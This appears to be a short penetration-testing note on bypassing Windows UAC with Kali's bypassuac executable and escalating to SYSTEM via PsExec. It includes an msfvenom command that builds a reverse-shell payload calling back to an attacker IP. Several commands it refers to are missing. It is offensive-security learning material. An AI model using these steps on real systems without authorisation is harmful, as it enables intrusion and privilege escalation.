Bypassuac using Bypassuac.exe
By passing UAC is one of the most important step that you may have to cross in order to elevate your privilege. Kali linux comes with an executable "bypassuac-x64.exe" to just do that.
This is useful in a scenario where you have obtained shell and the user belongs to an administrator group, however the assigned privileges are low and the shell is with UAC. Having UAC enabled without access to the GUI results in the user being prompted every time a process/application is initiated through the shell. Now in order to bypass the UAC we will follow the steps mentioned below,
This is a 2 stage process.
You will have to choose the right bypassuac executable based on the architecture of the computer. The files can be located in your kali system by using the "locate" command. Use msfvenom to create the payload - "reverse_shell.exe", in the port that Netcat is listening on. Then have the file transferred to the target Windows system and execute the following command,
Make sure you have the netcat running on your Linux system to capture the reverse shell. In the new shell run the following command to notice that many privileges are available now.
Now from this shell you can run Psexec to gain system shell,
Here a new reverse shell is created for a different port using msfvenom. Don't forget to have netcat listening to receive the reverse shell.
You can find more details about this from the following link,
You can create the reverse shell exe using the msfvenom with the following command,
msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=192.168.119.188 LPORT=443 -f exe -o reverse_shell.exe
Last updated